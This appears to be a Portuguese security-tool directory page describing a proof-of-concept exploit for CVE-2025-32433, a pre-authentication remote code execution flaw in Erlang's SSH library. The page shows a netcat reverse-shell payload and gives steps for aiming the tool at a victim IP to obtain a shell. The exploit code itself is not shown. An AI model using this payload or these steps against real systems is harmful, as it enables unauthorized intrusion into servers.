Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3243 — Um exploit de prova de conceito para CVE-2025-32433, uma vulnerabilidade crítica na biblioteca SSH do Erlang que permite execução de código pré-autenticada por meio de pacotes SSH_MSG_CHANNEL_REQUEST malformados. | Kitploit
Ferramentas/GitHubGitHub/tenebrae93/cve-2025-3243
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubtenebrae93/cve-2025-3243

CVE-2025-3243

Um exploit de prova de conceito para CVE-2025-32433, uma vulnerabilidade crítica na biblioteca SSH do Erlang que permite execução de código pré-autenticada por meio de pacotes SSH_MSG_CHANNEL_REQUEST malformados.

Ver Repositório
711há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit da Biblioteca SSH do Erlang CVE-2025-32433

Um exploit de prova de conceito para CVE-2025-32433, uma vulnerabilidade crítica na biblioteca SSH do Erlang que permite execução de código pré-autenticado através de pacotes SSH_MSG_CHANNEL_REQUEST malformados.


Características

  • Exploit original por Matthew Keeley
  • Versão atualizada por Tyler Ramsbey:
    • Argumentos de linha de comando para LHOST, LPORT, RHOST e RPORT
    • Ajuda e uso integrados via argparse
    • Payload de reverse shell no estilo Erlang usando os:cmd("nc LHOST LPORT -e /bin/sh").
    • Decomposição limpa de funções e registro de status para cada etapa

Pré-requisitos

  • Python 3
  • Um listener nc (Netcat) funcional na sua máquina atacante
  • Acesso de rede ao serviço SSH alvo (porta padrão 22)

  • Uso

    1. Inicie seu listener na máquina atacante:

      root@kitploit:~
      nc -lvnp 4444
      
    2. Execute o exploit:

      root@kitploit:~
      python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
      
    3. Aguarde o shell conectar de volta ao seu listener.

    Menu de Ajuda

    root@kitploit:~
    $ python3 CVE-2025-32433.py -h
    usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]
    
    Send a pre-auth SSH channel request with an Erlang RCE payload
    to get a reverse shell
    
    optional arguments:
      -h, --help            show this help message and exit
      -lh LHOST, --lhost LHOST
                            Local host/IP to receive the reverse shell
      -lp LPORT, --lport LPORT
                            Local port to receive the reverse shell
      -rh RHOST, --rhost RHOST
                            Target SSH server IP (default: 10.10.248.101)
      -rp RPORT, --rport RPORT
                            Target SSH server port (default: 22)
    

    Créditos

    • Script original por Matthew Keeley (MattKeeley)
    • Esta versão atualizada por Tyler Ramsbey

    Aviso Legal

    Use este código apenas em sistemas que você possui ou tem permissão explícita para testar. A exploração não autorizada de vulnerabilidades é ilegal e antiética.

    Baixar ferramenta